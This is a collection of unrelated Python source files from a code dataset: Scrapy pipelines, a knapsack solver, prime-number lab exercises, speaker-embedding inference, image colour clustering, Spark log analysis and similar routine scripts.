int(len(images_and_labels)*0.1)\n\n\t# print(type(images_and_labels[0][0]))\n\t# print(len(images_and_labels[:][0]))\n\t# print(images_and_labels[0][1].shape)\n\tfinal = np.array(images_and_labels)\n\tprint('extract from', final.shape)\n\n\t'''\n\t[\n\t\t[ [data],[label] ]\n\t]\n\n\t'''\n\n\ttrain_x = list(final[:, 0][:-test_size])\n\ttrain_y = list(final[:, 1][:-test_size])\n\n\ttest_x = list(final[:, 0][-test_size:])\n\ttest_y = list(final[:, 1][-test_size:])\n\n\tprint(len(train_x), len(test_x))\n\tprint(len(train_y), len(test_y))\n\tprint(len(train_x[0]), len(train_y[0]))\n\t'''\n\twith open('facialimage_set.pickle', 'wb') as f:\n\t\tpickle.dump([train_x, train_y, test_x, test_y], f)\n\t'''\n\treturn train_x, train_y, test_x, test_y\n\n\n\n\n\n","sub_path":"project1/generatePickle.py","file_name":"generatePickle.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"386784069","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nimport re\nimport csv\n\n\nclass CSVPipeline(object):\n    index = 0\n    file = None\n\n    def open_spider(self, spider):\n        # encoding='utf-8'\n        self.file = open(\"E:\\\\Graduation Project\\\\DataAnalysis\\\\data\\\\pidu_house.csv\", \"a\",newline='')\n\n    def process_item(self, item, spider):\n        if self.index == 0:\n            column_name = \"title,price,unit_price,community_name,region,type,construction_area,orientation,decoration,floor,elevator,purposes,release_date,house_structure,image_urls,from_url\\n\"\n            self.file.write(column_name)\n            self.index = 1\n        self.writer = csv.writer(self.file)\n        self.writer.writerow((item['title'], item['price'], item['unit_price'], item['community_name'],\n                              item['region'], item['type'], item['construction_area'], item['orientation'],\n                              item['decoration'],item['floor'],item['elevator'],item['purposes'],item['release_date'],\n                              item['house_structure'],item['image_urls'],item['from_url']))\n        return item\n\n    def close_spider(self, spider):\n        self.file.close()\n\nclass MultiPipeline(object):\n    file = None\n\n    def open_spider(self, spider):\n        # Multiple spider slaves write to the same house.csv at the same time\n        self.file = open(\"total_house.csv\", \"a\",newline='')\n\n    def process_item(self, item, spider):\n        self.writer = csv.writer(self.file)\n        self.writer.writerow((item['title'], item['price'], item['unit_price'], item['community_name'],\n                              item['region'], 
item['type'], item['construction_area'], item['orientation'],\n item['decoration'],item['floor'],item['elevator'],item['purposes'],item['release_date'],\n item['house_structure'],item['image_urls'],item['from_url']))\n return item\n\n def close_spider(self, spider):\n self.file.close()\n","sub_path":"bk_spider/bk/bk/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313822728","text":"from ..abstractsolver import AbstractSolver\nfrom ..model import Problem, Solution, Item\nfrom typing import List \nclass AbstractBnbSolver(AbstractSolver):\n \"\"\"\n An abstract branch-and-bound solver for the knapsack problems.\n\n Methods:\n --------\n upper_bound(left : List[Item], solution: Solution) -> float:\n given the list of still available items and the current solution,\n calculates the linear relaxation of the problem\n \"\"\"\n \n def upper_bound(self, left : List[Item], solution: Solution) -> float:\n sorted_items = sorted(left, reverse=True, key=lambda i: i.value / i.weight)\n capacity_left = self.problem.capacity - solution.weight\n current_value = solution.value\n for item in sorted_items:\n how_much_to_take = min(capacity_left, item.weight)\n capacity_left -= how_much_to_take\n current_value += (how_much_to_take / item.weight) * item.value\n\n if capacity_left <= 0:\n break\n return current_value\n\n \n def solve(self) -> Solution:\n raise Exception(\"this is an abstract solver, don't try to run it!\")","sub_path":"lab08_minimax-master/lab08_minimax-master/saport/knapsack/solvers/bnb.py","file_name":"bnb.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"178035279","text":"#################################################\n# Lab2\n#################################################\n\nimport cs112_f17_week2_linter\nimport math\n\n#################################################\n# Helper functions\n#################################################\n\n#ShivumAgarwal\n\ndef almostEqual(d1, d2, epsilon=10**-7):\n # note: use math.isclose() outside 15-112 with Python version 3.5 or later\n return (abs(d2 - d1) < epsilon)\n\nimport decimal\ndef roundHalfUp(d):\n # Round to nearest with ties going away from zero.\n rounding = decimal.ROUND_HALF_UP\n # See other rounding options here:\n # https://docs.python.org/3/library/decimal.html#rounding-modes\n return int(decimal.Decimal(d).to_integral_value(rounding=rounding))\n\n# Put your solution to getKthDigit here!\ndef getKthDigit(n, k): \n if (n<0):\n y = abs(n)\n x = (y//(10**k))%10\n return x\n else:\n x = (n//(10**k))%10\n return x\n\n# See if you can rewrite isPrime from lecture here!\ndef isPrime(n):\n if (n < 2):\n return False\n for i in range(2,n):\n if (n % i == 0):\n return False\n return True\n\n#################################################\n\ndef numberLength(x):\n y = abs(x) \n #Accounts for negative numbers\n digits = 0\n #Counter for total digits \n while (y>0):\n y //= 10\n digits += 1\n #keeps dividing number until 0 and digits increments as well\n return digits\n\n\ndef countMatchingDigits(x, y):\n matchingDigits = 0\n #set counter for matching digits\n Xlength = numberLength(x)\n Ylength = numberLength(y)\n #get lengths for both x and y\n for i in range(Xlength):\n #loops through x\n Xdigit = getKthDigit(x,i)\n #gets digit for x\n for j in range(Ylength):\n #loops through y\n Ydigit = 
getKthDigit(y,j)\n #gets digit for y\n if (Xdigit == Ydigit):\n matchingDigits +=1\n #increments matchingdigits for each instance of match\n \n return matchingDigits \n\n\ndef rotateNumber(x):\n xlength = numberLength(x)\n #set number of digits in x\n if (xlength == 1):\n return x\n #one digit numbers stay the same\n val = x%10\n #gets onesdigit\n y = x//10\n #integer divides original number by ten \n newx = val*10**(xlength-1)+y\n #new number is the sum of val multiplied by 10 to a certain power plus y\n return newx\n\ndef isCircularPrime(x):\n count = 0\n #sets count\n xlength = numberLength(x)\n #sets length\n if (x == 0):\n return False\n #avoides the logic error of 0 being a prime\n if (not isPrime(x)):\n return False\n #prevents even numbers from being recognized as circular primes\n while (count < xlength):\n x = rotateNumber(x)\n if (not isPrime(x)):\n return False \n count +=1\n return True\n #rotates numbers and checks if they're prime\n \n\ndef nthCircularPrime(n):\n found = 0\n guess = 0\n i = 0\n #sets variables for counter and the circular prime numbers/indexes\n while (found <= n):\n if (isCircularPrime(i)):\n guess = i\n found += 1\n i+=1\n #loops until found reaches n and guess is the actual nth circularprime\n return guess\n \ndef reverseNum(n):\n reverse = 0\n #establishes variable for reversed num\n while (n>0):\n onesdigit = n%10\n #gets onesdigit\n reverse = reverse*10+onesdigit\n #adds reverse to opposite of n\n n = n //10\n #int divide n to reach next digit\n return reverse\n \ndef nthEmirpsPrime(n):\n found = 0\n guess = 0\n i = 10\n #sets variables for counter and the circular prime numbers/indexes\n\n while (found <= n): \n if (i == reverseNum(i)):\n i+=1\n #skips instances where reverse of n is the same as n\n if (isPrime(i) and isPrime(reverseNum(i))): \n guess = i\n found += 1 \n #set guess to current value in loop and increments found\n i+=1\n return guess\n \n\n######################################################################\n# ignore_rest: The autograder will ignore all code below here\n######################################################################\n\n#################################################\n# Test Functions\n#################################################\n\ndef testNumberLength():\n print('Testing numberLength()... ', end='')\n assert(numberLength(12) == 2)\n assert(numberLength(3) == 1)\n assert(numberLength(89) == 2)\n assert(numberLength(12345) == 5)\n assert(numberLength(120021) == 6)\n assert(numberLength(5000) == 4)\n print('Passed!')\n\ndef testCountMatchingDigits():\n print('Testing countMatchingDigits()... ', end='')\n assert(countMatchingDigits(1234, 2071) == 2)\n assert(countMatchingDigits(2203, 1527) == 2)\n assert(countMatchingDigits(5, 1253) == 1)\n assert(countMatchingDigits(18737, 7) == 2)\n assert(countMatchingDigits(1220, 7322) == 4)\n assert(countMatchingDigits(1234, 5678) == 0)\n print('Passed!')\n\ndef testRotateNumber():\n print('Testing rotateNumber()... ', end='')\n assert(rotateNumber(1234) == 4123)\n assert(rotateNumber(4123) == 3412)\n assert(rotateNumber(3412) == 2341)\n assert(rotateNumber(2341) == 1234)\n assert(rotateNumber(5) == 5)\n assert(rotateNumber(111) == 111)\n print('Passed!')\n\ndef testIsCircularPrime():\n print('Testing isCircularPrime()... 
', end='')\n assert(isCircularPrime(2) == True)\n assert(isCircularPrime(11) == True)\n assert(isCircularPrime(13) == True)\n assert(isCircularPrime(79) == True)\n assert(isCircularPrime(197) == True)\n assert(isCircularPrime(1193) == True)\n print('Passed!')\n\ndef testNthCircularPrime():\n print('Testing nthCircularPrime()... ', end='')\n assert(nthCircularPrime(0) == 2)\n assert(nthCircularPrime(4) == 11)\n assert(nthCircularPrime(5) == 13)\n assert(nthCircularPrime(11) == 79)\n assert(nthCircularPrime(15) == 197)\n assert(nthCircularPrime(25) == 1193)\n print('Passed!')\n\ndef testNthEmirpsPrime():\n print('Testing nthEmirpsPrime()... ', end='')\n assert(nthEmirpsPrime(0) == 13)\n assert(nthEmirpsPrime(5) == 73)\n assert(nthEmirpsPrime(10) == 149)\n assert(nthEmirpsPrime(20) == 701)\n assert(nthEmirpsPrime(30) == 941)\n print('Passed.')\n\n#################################################\n# testAll and main\n#################################################\n\ndef testAll():\n testNumberLength()\n testCountMatchingDigits()\n testRotateNumber()\n testIsCircularPrime()\n testNthCircularPrime()\n testNthEmirpsPrime()\n\ndef main():\n cs112_f17_week2_linter.lint() # check style rules\n testAll()\n\nif __name__ == '__main__':\n main()\n","sub_path":"Python Problems -SA/Week 2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"382706281","text":"# encoding: utf-8\n# This is a sample commands.py. You can add your own commands here.\n#\n# Please refer to commands_full.py for all the default commands and a complete\n# documentation. Do NOT add them all here, or you may end up with defunct\n# commands when upgrading ranger.\n\n# You always need to import ranger.api.commands here to get the Command class:\nfrom ranger.api.commands import *\n\n# A simple command for demonstration purposes follows.\n# -----------------------------------------------------------------------------\n\n# You can import any python module as needed.\nimport os\n\nclass rename_images(Command):\n # The so-called doc-string of the class will be visible in the built-in\n # help that is accessible by typing \"?c\" inside ranger.\n \"\"\":rename_images\n\n Batch renaming images based on filename order\n \"\"\"\n\n # The execute method is called when you run this command in ranger.\n def execute(self):\n d = self.fm.thisfile\n \n if d.is_directory:\n renamecmd = [ os.path.expanduser(\"~/.config/ranger/rename_images.zsh\"), str(d) ]\n self.fm.run( renamecmd )\n else:\n self.fm.notify(\"Not a directory!\")\n\nclass grename(Command):\n \"\"\":grename\n\n Rename gallery directory\n \"\"\"\n\n def execute(self):\n from ranger import MACRO_DELIMITER, MACRO_DELIMITER_ESC\n\n d = self.fm.thisfile\n\n if d.is_directory:\n basename = d.basename.replace(MACRO_DELIMITER, MACRO_DELIMITER_ESC)\n new_name = \"-\".join(basename.split(\"–\")[-1].strip().split()[0:-1]).lower()\n self.fm.open_console(\"rename \" + new_name)\n else:\n self.fm.notify(\"Not a directory\")\n","sub_path":".config/ranger/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"501503385","text":"\r\nclass Solution(object):\r\n \"\"\"\r\n Find the kth largest element in an unsorted array.\r\n Note that it is the kth largest element in the sorted order, not the kth distinct element.\r\n\r\n For example,\r\n Given 
[3,2,1,5,6,4] and k = 2, return 5.\r\n\r\n Note:\r\n You may assume k is always valid, 1 ≤ k ≤ array's length.\r\n \"\"\"\r\n def findKthLargest(self, nums, k):\r\n \"\"\"\r\n :type nums: List[int]\r\n :type k: int\r\n :rtype: int\r\n \"\"\"\r\n ret = []\r\n for e in nums:\r\n ret.append(e)\r\n if len(ret) > k:\r\n ret.sort()\r\n ret.pop(0)\r\n print(nums, ret[0])\r\n return ret[0]\r\n\r\nif __name__ == \"__main__\":\r\n a = Solution()\r\n a.findKthLargest([3,2,1,5,6,4], 2)\r\n a.findKthLargest([3,2,1,5,6,4], 4)\r\n","sub_path":"leet/215.KthLargestElementInAnArray.py","file_name":"215.KthLargestElementInAnArray.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"9037533","text":"#!/usr/bin/python\r\n\r\nimport os\r\nimport sys\r\nimport time\r\nimport shutil\r\nimport ziputil\r\n\r\n# official.py\r\n# Exports the IMOS Toolbox from SVN and\r\n#\r\n# - Creates an archive of the source \r\n# - Runs Util/imosPackage.m to to package the source\r\n# \r\n# These files are submitted back to the project as file downloads.\r\n#\r\n# python, svn (SlikSvn), scp and matlab must be on PATH\r\n#\r\n\r\nlt = time.localtime()\r\nat = time.asctime()\r\n\r\nproject = 'imos-toolbox'\r\n\r\ndef submit(archive):\r\n\r\n user = 'ggalibert'\r\n server = '10-nsp-mel.emii.org.au'\r\n dir = '/mnt/imos-t4/IMOS/public/eMII/softwares/imos-toolbox'\r\n http_url = 'http://data.aodn.org.au/IMOS/public/eMII/softwares/imos-toolbox/'\r\n\r\n print('\\n--submitting %s to %s' % (archive,http_url))\r\n cmd = 'scp %s %s@%s:%s' % (archive,user,server,dir)\r\n \r\n os.system(cmd)\r\n\r\nversion = '2.4'\r\n \r\nurl = 'https://github.com/aodn/%s.git' % project\r\nexportDir = 'export'\r\nstdArchive = 'imos-toolbox-%s.zip' % version\r\n\r\ncompilerLog = './%s/log.txt' % exportDir\r\n\r\n#\r\n# export from SVN\r\n#\r\nprint('\\n--exporting tree from %s to %s' % (url, exportDir))\r\nos.system('git clone %s %s' % (url, exportDir))\r\n\r\n#\r\n# remove snapshot directory\r\n#\r\nprint('\\n--removing snapshot')\r\nshutil.rmtree('%s/snapshot' % exportDir)\r\n\r\n#\r\n# create snapshot\r\n#\r\nprint('\\n--creating snapshot')\r\nmatlabOpts = '-nodisplay -wait -logfile \"%s\"' % compilerLog\r\nmatlabCmd = \"addpath('Util'); try, imosPackage(); exit(); catch e, disp(e.message); end;\"\r\nos.system('cd %s && matlab %s -r \"%s\"' % (exportDir, matlabOpts, matlabCmd))\r\nshutil.copy('%s/imos-toolbox.zip' % exportDir, './%s' % stdArchive)\r\n\r\ntry:\r\n submit(stdArchive)\r\n\r\nexcept:\r\n print('\\n--Snapshot upload error. 
Check script, fix and then delete previous files before running new snapshot')\r\n\r\nprint('\\n--removing local git tree and archives')\r\nshutil.rmtree('%s' % exportDir)\r\nos.remove(stdArchive)\r\n","sub_path":"snapshot/official.py","file_name":"official.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"29473577","text":"from encoder.params_data import *\nfrom encoder.model import SpeakerEncoder\nfrom encoder.audio import preprocess_wav # We want to expose this function from here\nfrom matplotlib import cm\nfrom encoder import audio\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\n\n_model = None # type: SpeakerEncoder\n_device = None # type: torch.device\n\n#load_model(\"./app/insert/encoder/saved_models/pretrained.pt\")\ndef load_model(weights_fpath: Path, device=None):\n '''\n This Method loads the model \n PARAMS:\n weights_fpath: The path to the weights of the pretrained model(Must be a Path object) \n '''\n global _model, _device\n if device is None:\n _device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n elif isinstance(device, str):\n _device = torch.device(device)\n _model =SpeakerEncoder(_device, torch.device(\"cpu\"))\n checkpoint = torch.load(weights_fpath)\n _model.load_state_dict(checkpoint[\"model_state\"])\n _model.eval()\n \n\n\ndef computeEmbeddingForBatch(framesInBatches):\n '''\n This method computes the embedding for a batch of partial utterances\n it done so by feeding the batch of frames(in mel spectogram) \n to the network\n '''\n if _model is None:\n raise Exception(\"Model was not loaded. Call load_model() before inference.\")\n \n frames = torch.from_numpy(framesInBatches).to(_device)\n embed = _model.forward(frames).detach().cpu().numpy()\n return embed\n\n\ndef computeSlices(n_samples, partial_utterance_n_frames=partials_n_frames,\n min_pad_coverage=0.75, overlap=0.5):\n '''\n This Method computes for the utterance and the mel spectorgram that will be obtained from it,\n the begining and end of every slice.\n This method returns two lists of slices:\n 1-wav slices:where to slice the wav every element of this list is a slice object \n 2-mel slices:where to slice the mel \n '''\n assert 0 <= overlap < 1\n assert 0 < min_pad_coverage <= 1\n numSamplesInFrame = int((sampling_rate * mel_window_step / 1000))#This number is divided by 1000 because the unit in sampling rate is sample/sec\n totalFrames = int(np.ceil((n_samples + 1) / numSamplesInFrame))#total number of frames\n frameStep = max(int(np.round(partial_utterance_n_frames * (1 - overlap))), 1)#This variable represents the step we need to move from one partial utterance to the other one\n # Compute the slices\n wSlices, mSlices = [], []#a list that will contain the slices of the wav and mel spectograms respectively\n numPartialUtterances = max(1, totalFrames - partial_utterance_n_frames + frameStep + 1)#this variable represents the number of partial utterances in the wav\n for i in range(0, numPartialUtterances, frameStep):\n mRange = np.array([i, i + partial_utterance_n_frames])# \"i\" represents the start frame of this partial utterance and i+partial_utterance_n_frames represents the end frame\n wRange = mRange * numSamplesInFrame #the start of this range is the start sample number and end is the end sample number \n mSlices.append(slice(*mRange))\n wSlices.append(slice(*wRange))\n # Evaluate whether extra padding is warranted or not\n 
last_wav_range = wSlices[-1]\n coverage = (n_samples - last_wav_range.start) / (last_wav_range.stop - last_wav_range.start)\n if coverage < min_pad_coverage and len(mSlices) > 1:\n mSlices = mSlices[:-1]\n wSlices = wSlices[:-1]\n return wSlices, mSlices\n\n\ndef computeEmbedding(wav, **kwargs):\n '''\n This Method computes the embedding vector for the wav paramater\n\n PARAMS:\n wav:the preprocessed wav file for which the e-vector will be calculated\n\n RETURNS:\n the embedding of the wav object \n '''\n \n # If the last slice size is larger than the length of the wav then we \n #must zero-pad the wav \n wSlices, mSlices = computeSlices(len(wav), **kwargs)\n lastSliceStop = wSlices[-1].stop\n if lastSliceStop >= len(wav):\n wav = np.pad(wav, (0, lastSliceStop - len(wav)), \"constant\")\n #compute the mel spectogram of the wav\n frames = audio.wav_to_mel_spectrogram(wav)\n #group every mslice into an array which will be fed to the network\n framesInBatches = np.array([frames[s] for s in mSlices])\n #for every member in partialEmbeddings is the e-vector for the partial utterance \n partialEmbeddings = computeEmbeddingForBatch(framesInBatches)\n # The embedding vector of the complete utterance will be the normalization of the averaged version\n averageEmbedding = np.mean(partialEmbeddings, axis=0)\n embed = averageEmbedding / np.linalg.norm(averageEmbedding, 2)\n return embed\n\n\n\n","sub_path":"app/insert/encoder/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"515744387","text":"# coding=utf-8\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.contrib.sites.models import Site\nfrom quizme.core.utils import send_email\nfrom .models import Receipt\n\n\n@receiver(post_save, sender=Receipt)\ndef email_receipt(sender, **kwargs):\n\tif kwargs['created']:\n\t\tr = kwargs['instance']\n\n\t\tsend_email(\n\t\t\tsubject = 'Kvitto på ditt köp från QuizMe.se',\n\t\t\ttemplate_name = 'receipt',\n\t\t\temail = r.account.email,\n\t\t\tcontext = {\n\t\t\t\t'receipt': r, \n\t\t\t\t'site_url': Site.objects.get_current().domain\n\t\t\t}\n\t\t)\n","sub_path":"receipt/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"363445548","text":"import glob\nimport os\nfrom scipy.ndimage import imread\nimport numpy\nimport pickle\nfrom PIL import Image\n\ngtdir = '1st_manual'\nr1 = 3\nr2 = 4\n\n\nfor fGT in glob.glob(os.path.join(gtdir,'*_manual1.gif.composite.png')):\n img = imread(fGT)\n H,W,C = img.shape\n\n new_gt = numpy.zeros((H,W,5))\n for i in range(H):\n for j in range(W):\n if img[i,j,0]==0:\n new_gt[i,j] = [1,0,0,0,0]\n for i in range(H):\n for j in range(W):\n if img[i,j,0]>0 and img[i,j,1]>0:\n new_gt[i,j] = [0,0,0,0,1]\n for a in range(-3,4):\n for b in range(-3,4):\n if a ** 2 + b ** 2 < r1**2 and img[i+a,j+b,0]==0:\n new_gt[i+a,j+b] = [0,0,1,0,0]\n if img[i,j,0]>0 and img[i,j,1]==0:\n new_gt[i,j] = [0,0,0,1,0]\n for a in range(-3,4):\n for b in range(-3,4):\n if a**2+b**2 None:\n super(SignalRFeature, self).__init__(**kwargs)\n self.value = value\n self.properties = 
properties\n","sub_path":"sdk/signalr/azure-mgmt-signalr/azure/mgmt/signalr/models/signal_rfeature_py3.py","file_name":"signal_rfeature_py3.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"89839938","text":"# Spark - Resolução\r\n\r\n\r\n### 1. Número de hosts únicos\r\ntxt_log = sc.textFile(\"hdfs:///user/cloudera/semantix/access_log_Jul95,hdfs:///user/cloudera/semantix/access_log_Aug95\")\r\n\r\nhosts = txt_log.map(lambda cols: cols.split(\" - - \")).map(lambda cols: (cols[0],1)).reduceByKey(lambda a,b: a + b) \r\n\r\nhosts.keys().count()\r\n#137979\r\n###\r\n\r\n\r\n### 2. Total de errors 404\r\nstep1 = txt_log.map(lambda cols: cols.split('] \"'))\r\n\r\nstep2 = step1.map(lambda cols: cols[1] if(cols is not None and len(cols) > 1) else None)\r\n\r\nstep3 = step2.map(lambda cols: cols.split('\" ') if(cols is not None and len(cols.split('\" ')) > 1) else None)\r\n\r\nrtnHttp_RtnBytes = step3.map(lambda cols: cols[1].split(' ') if(cols is not None and len(cols[1].split(' ')) > 1) else None)\r\n\r\nstep5 = rtnHttp_RtnBytes.map(lambda cols: (cols[0] if(cols is not None) else \"-999\",1)).reduceByKey(lambda a,b: a + b)\r\n\r\nstep5.collect()\r\n#Foram 20873 retornos 404\r\n#[('-999', 31), (u'304', 266773), (u'403', 224), (u'200', 3100521), (u'302', 73070), (u'500', 65), (u'501', 41), (u'404', 20873), (u'400', 15)]\r\n###\r\n\r\n\r\n### 3. Os 5 URLs que mais causaram erro 404\r\nurls404 = step3.filter(lambda cols: (cols[1].split(' ')[0] if(cols is not None and len(cols[1].split(' ')) > 1) else None) == \"404\")\r\n\r\nurls404Quebrado = urls404.map(lambda cols: cols[0].split(' '))\r\n\r\nurls404ChaveValor = urls404Quebrado.map(lambda cols: (cols[1],1))\r\n\r\nurls404Contagem = urls404ChaveValor.reduceByKey(lambda a, b: a + b)\r\n\r\nurls404Contagem.takeOrdered(5, key = lambda r: -r[1])\r\n#[(u'/pub/winvn/readme.txt', 2004), (u'/pub/winvn/release.txt', 1732), (u'/shuttle/missions/STS-69/mission-STS-69.html', 683), (u'/shuttle/missions/sts-68/ksc-upclose.gif', 428), (u'/history/apollo/a-001/a-001-patch-small.gif', 384)]\r\n###\r\n\r\n### 4. Quantidade de erros 404 por dia.\r\nurls404ComTimestamp = step1.filter(lambda cols: (cols[1].split('\" ')[1].split(' ')[0] if(cols is not None and len(cols) > 1 and cols[1] is not None and len(cols[1].split('\" ')) > 1) and cols[1].split('\" ')[1] is not None and cols[1].split('\" ')[1].split(\" \") is not None and len(cols[1].split('\" ')[1].split(\" \")) > 1 else None) == \"404\")\r\n\r\nurls404ComTimestampQuebra = urls404ComTimestamp.map(lambda cols: cols[0].split(\" - - [\"))\r\n\r\nurls404ComTimestampQuebraZona = urls404ComTimestampQuebra.map(lambda cols: cols[1].split(\" \"))\r\n\r\nfrom datetime import datetime\r\n\r\nurls404ComTimestampContagem = urls404ComTimestampQuebraZona.map(lambda cols: (datetime.strptime(cols[0], \"%d/%b/%Y:%H:%M:%S\").date(),1))\r\n\r\nurls404ComTimestampContagemConsolidado = urls404ComTimestampContagem.reduceByKey(lambda a, b: a + b)\r\n\r\nurls404ComTimestampContagemTotal = urls404ComTimestampContagemConsolidado.values().reduce(lambda a,b:a+b)\r\n\r\nurls404ComTimestampContagemTotal / urls404ComTimestampContagemConsolidado.keys().count()\r\n#Em media são 359 erros 404 por dia\r\n###\r\n\r\n### 5. 
O total de bytes retornados\r\nrtnBytes = rtnHttp_RtnBytes.map(lambda cols: int(cols[1] if(cols is not None and cols[1] is not None and cols[1] != '-') else 0) ).reduce(lambda a,b:a+b)\r\n\r\nprint(rtnBytes)\r\n#Foram 65524307881 de bytes retornados\r\n###\r\n\r\n\r\n\r\n\r\n","sub_path":"codigo_spark.py","file_name":"codigo_spark.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"569341096","text":"from django.core.management.base import BaseCommand\nfrom oscico.settings_local import BASE_DIR #LOCAL SETTING !!!!!!!\nfrom topics.models import SubTopic\n\nfrom collections import namedtuple\nfrom math import sqrt\nimport random\n\n\nimport struct\n\n\n#https://charlesleifer.com/blog/using-python-and-k-means-to-find-the-dominant-colors-in-images/\n\ntry:\n import Image\nexcept ImportError:\n from PIL import Image\n\nPoint = namedtuple('Point', ('coords', 'n', 'ct'))\nCluster = namedtuple('Cluster', ('points', 'center', 'n'))\n\ndef get_points(img):\n points = []\n w, h = img.size\n for count, color in img.getcolors(w * h):\n points.append(Point(color, 3, count))\n return points\n\ndef calculate_center(points, n):\n vals = [0.0 for i in range(n)]\n plen = 0\n for p in points:\n plen += p.ct\n for i in range(n):\n vals[i] += (p.coords[i] * p.ct)\n return Point([(v / plen) for v in vals], n, 1)\n\ndef euclidean(p1, p2):\n return sqrt(sum([\n (p1.coords[i] - p2.coords[i]) ** 2 for i in range(p1.n)\n ]))\n\ndef kmeans(points, k, min_diff):\n clusters = [Cluster([p], p, p.n) for p in random.sample(points, k)]\n\n while 1:\n plists = [[] for i in range(k)]\n\n for p in points:\n smallest_distance = float('Inf')\n for i in range(k):\n distance = euclidean(p, clusters[i].center)\n if distance < smallest_distance:\n smallest_distance = distance\n idx = i\n plists[idx].append(p)\n\n diff = 0\n for i in range(k):\n old = clusters[i]\n center = calculate_center(plists[i], old.n)\n new = Cluster(plists[i], center, old.n)\n clusters[i] = new\n diff = max(diff, euclidean(old.center, new.center))\n\n if diff < min_diff:\n break\n\n return clusters\n\nrtoh = lambda rgb: '#%s' % ''.join(('%02x' % p for p in rgb))\n\n\ndef colorz(filename, n=3):\n img = Image.open(filename)\n img.thumbnail((200, 200))\n w, h = img.size\n\n points = get_points(img)\n clusters = kmeans(points, n, 1)\n rgbs = [map(int, c.center.coords) for c in clusters]\n\n return list(map(rtoh, rgbs))\n\n\ndef HexToRGB(hex_color):\n h = '0x'+hex_color.lstrip('#')\n h1, h2, h3 = h[0:4], '0x' + h[4:6], '0x' + h[6:8]\n r, g , b = int(h1, 16), int(h2, 16), int(h3, 16)\n return (r, g, b)\n\n\n# https://docs.djangoproject.com/en/1.8/howto/custom-management-commands/\n\n\nclass Command(BaseCommand):\n help = 'Updating the hexadecimal background colour associated with a logo'\n\n def handle(self, *args, **options):\n\n #make initial default color\n try:\n Color.objects.get(pk=1)\n except Color.DoesNotExist:\n c = Color(pk=1, logo_hex=\"#000000\", logo_r=0, logo_g=0, logo_b=0, text_hex=\"#ffffff\")\n c.save()\n\n\n\n for subtopic in SubTopic.objects.all():\n if subtopic.logo:\n img_filename = BASE_DIR+subtopic.logo.url\n three_main_hex_colors = colorz(img_filename)\n main_hex_color = three_main_hex_colors[0]\n r, g, b, = HexToRGB(main_hex_color)\n\n color = Color(logo_hex = main_hex_color, logo_r = r, logo_g = g, logo_b = b)\n color.save()\n subtopic.color = color\n subtopic.save()\n\n self.stdout.write('All subtopic logo image colors have been add 
successfully')\n","sub_path":"topics/management/commands/updateLogoColor.py","file_name":"updateLogoColor.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313042530","text":"import pandas as pd\n\n\nimport sys\n\n\ninput_matrix =sys.argv[1]\n\n\nintensity_detected = pd.read_csv(input_matrix)\nintensity_detected.index = intensity_detected['Metabolite']\ndel intensity_detected['Metabolite']\n\nflux_metabolites = intensity_detected.index.tolist()\n\nzero_index = []\nfor index,metabolite in enumerate(flux_metabolites):\n #print(index,metabolite)\n if metabolite.split('-').pop() == '0':\n #print(index,\"This is 0th ################\")\n zero_index.append(index)\n\n \ntotal_index_zip = []\nfor i,item in enumerate(zero_index):\n if i != 0:\n get_previous=zero_index[i-1]\n paired_index_subset = [get_previous,item]\n total_index_zip.append(paired_index_subset)\n\nlast_search = [zero_index[-1],len(flux_metabolites)]\ntotal_index_zip.append(last_search)\n\n\nmyDataFrame = []\nfor x,y in total_index_zip:\n flux_search = (flux_metabolites[x:y])\n flux_search_0_removed = flux_search[1:]\n test = (intensity_detected[intensity_detected.index.isin(flux_search)])\n test_removed = (intensity_detected[intensity_detected.index.isin(flux_search_0_removed)])\n new_final_test = test_removed.sum(axis=0) / test.sum(axis=0) * 100\n new_final_df = pd.DataFrame(new_final_test).transpose()\n new_final_df.index = [flux_search[0]]\n #print(pd.DataFrame(new_final_df))\n myDataFrame.append(new_final_df)\n\n\noutput_name = input_matrix.split('/')[0] + '/' + input_matrix.split('/')[1] + '/'+ 'flux.output.csv'\n\nappended_data = pd.concat(myDataFrame, axis=0)\nappended_data = appended_data.round(2)\n\nappended_data.to_csv(output_name) \nprint(\"Flux Analysis Complete\")\n","sub_path":"scripts/flux.py","file_name":"flux.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"485583079","text":"import os\nimport gym\nimport numpy as 